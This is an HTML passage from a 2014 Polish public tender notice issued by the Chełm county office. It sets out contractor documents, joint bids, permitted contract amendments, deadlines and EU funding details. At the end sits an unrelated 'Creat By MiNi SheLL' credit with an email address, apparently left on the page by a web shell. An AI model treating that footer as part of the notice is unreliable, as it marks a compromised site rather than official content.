<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wykazujących brak podstaw do wykluczenia z postępowania o udzielenie zamówienia. 
Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców w rozumieniu art. 23 ustawy. W przypadku złożenia oferty wspólnej każdy z wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1 oraz w art. 24 ustawy. Wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokumenty należy złożyć w formie oryginału lub kopi poświadczonej za zgodność z oryginałem przez Wykonawcę bądź upoważnionego przedstawiciela Wykonawcy, zgodnie z treścią dokumentu określającego status Wykonawcy bądź treścią załączonego do oferty pełnomocnictwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty w zakresie:
1)terminu realizacji umowy gdy jest ona spowodowana:
a)warunkami atmosferycznymi uniemożliwiającymi wykonywanie robót w stosunku do których prowadzony jest nadzór (przez warunki atmosferyczne uniemożliwiające wykonywanie robót należy rozumieć warunki atmosferyczne w znaczny sposób odbiegające od warunków zwykle panujących o tej samej porze roku na terenie realizowania robót,
b)epidemią stwierdzoną przez uprawnione do tego organy,
c)siłą wyższą, 
d)wadami dokumentacji projektowej uniemożliwiającymi prawidłowe wykonanie przedmiotu umowy na roboty budowlane stanowiące przedmiot nadzoru zgodnie z zasadami sztuki budowlanej i skutkującymi przerwą w realizacji robót budowlanych.
2)zmiany osób przewidzianych do realizacji zamówienia przez strony w przypadku zdarzeń takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków pod warunkiem, że zaproponowane osoby będą miały kwalifikacje nie niższe od osób wskazanych w umowie.
Zmiany umowy wymagają zgody Zamawiającego i Wykonawcy w formie sporządzonego na piśmie i podpisanego przez strony aneksu. Poza przypadkami wymienionymi wyżej Zamawiający nie przewiduje zmiany innych istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.powiat.chelm.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Chełmie, Plac Niepodległości 1, 22-100 Chełm, parter, pokój Nr 25.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Chełmie, Plac Niepodległości 1, 22-100 Chełm, I piętro, pokój Nr 127.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie realizowane jest w ramach działania Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez scalanie gruntów objętego Programem Rozwoju Obszarów Wiejskich 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com